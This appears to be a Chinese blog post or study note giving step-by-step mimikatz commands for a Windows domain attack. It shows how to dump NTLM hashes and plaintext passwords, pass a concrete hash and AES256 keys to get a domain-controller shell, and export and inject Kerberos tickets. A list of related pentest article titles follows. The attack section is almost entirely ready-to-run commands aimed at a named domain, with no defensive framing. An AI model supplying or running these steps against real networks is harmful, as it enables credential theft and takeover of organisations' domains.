(1)管理员运行

(2)必须输入

privilege::debug


(3)在目标主机使用mimikatz获取ntlm hash
winserver 2012R2 之前版本 可以获取到明文密码

sekurlsa::logonpasswords

(4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6d043

mimikatz执行后 会弹出一个拥有对应 hash用户权限的 cmd窗口
可看到 弹出 域控的 cmd权限

(5) aes-256密钥

使用 mimikatz抓取密钥

sekurlsa::ekeys

获取到 aes-25后

sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /aes256:“aes256的值”

需要目标机器上安装 KB2871997补丁 安装了 该补丁后 ,就可以通过AES256密钥 进行哈希传递啦。

票据传递

privilege::debug
sekurlsa::tickets /export

执行该命令后 会在当前目录生成多个服务的票据文件 例如 kirbi等

使用以下命令 清楚 内存中的票据

kerberos::purge

将票据文件注入内存

kerberos::ptt “[0;4beae]-2-0-40e00000-Administrator@krbtgt-YXY.YOUTHBELIEF.COM.kirbi”

“文件名”

在当前终端 退出 mimikatz 然后就可以列出目标目录啦。

除了mimikatz工具 还可以用 kekeo传递票据。

mimikatz使用哈希 ntlm传递 票据传递相关推荐

  1. 【内网学习笔记】21、哈希传递与票据传递

    1.哈希传递 哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式. 通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Win ...

  2. 【内网安全】域横向PTHPTKPTT哈希票据传递

    Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测 ...

  3. 内网域横向PTHPTKPTT哈希票据传递

    内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...

  4. 哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较

    Mimikatz在本文章中会用到的命令 privilege::debug #提升权限 sekurlsa::logonpasswords #抓取密码信息 sekurlsa::msv #抓取LM.NTLM ...

  5. 【内网渗透】域横向PTHPTKPTT哈希票据传递

    目录 0x001 相关知识 0x002 域横向移动PTH NTML传递 0x003 域横向移动PTK aes256传递 0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&a ...

  6. 内网横向移动|PTT票据传递横向|Mimikatz Kerberos

    票据传递攻击(Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NT ...

  7. 内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK(传递密钥)

    目录 PTH(pass-the-hash)传递哈希 Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) 传递票据

  8. 内网渗透之PPT票据传递攻击(Pass the Ticket)

    文章目录 内网渗透之PPT票据传递攻击(Pass the Ticket) 前言 Kerberos 协议& Kerberos 认证原理 Kerberos 认证原理 ASREQ & ASR ...

  9. 域渗透PTT票据传递攻击(Pass the Ticket)

    文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源 ...

最新文章

  1. Java IO流-File类
  2. 搭建consul 集群
  3. Windows Server 2012正式版RDS系列④
  4. HDU 1043 Eight(八数码)
  5. CSS布局之脱离文档流详解——浮动、绝对定位脱离文档流的区别
  6. ZOJ 3735 Josephina and RPG
  7. 微软开源的Trill是什么?
  8. 想要成为真正优秀的程序员是不是真的很难?
  9. 字节还有打游戏、听音乐这种神仙工作?
  10. javascript闭包(Module模式)的用途和高级使用方式
  11. 深度学习系列资料总结
  12. 堆和栈内存扩展方向问题
  13. iS3 岩石隧道数据准备手册
  14. 通过堡垒机rdp 黑屏_如何绕过堡垒机远程登录
  15. 小牛采购管理系统 v3.01 bt
  16. http和https请求工具类
  17. 阿里云使用体验-阿里云开发者社区
  18. Docker介绍与使用
  19. 毕业设计之外文翻译(工具篇)
  20. linux 磁盘压测工具 fps,荣耀MagicBook Pro锐龙版性能评测,可媲美MX150 2GB核心显卡...

热门文章

  1. flume 多个source sinks channel 配置记录
  2. android 遍历实体类,Java中遍历实体类(处理MongoDB)
  3. tkinter绘制组件(10)——组合框/下拉框
  4. 花园与溪流:建造花园的人将赢得未来
  5. POJ - 1611 The Suspects
  6. PCB走线延时1inch(1英寸,1000mil)
  7. guid格式的操作系统安装
  8. 豆芽八股专栏之嵌入式
  9. 有个厉害的程序员老婆是什么体验?,最新JAVA面试合集
  10. 心电图多少为正常范围_【心电图参数及正常范围】_指标_正常值-大众养生网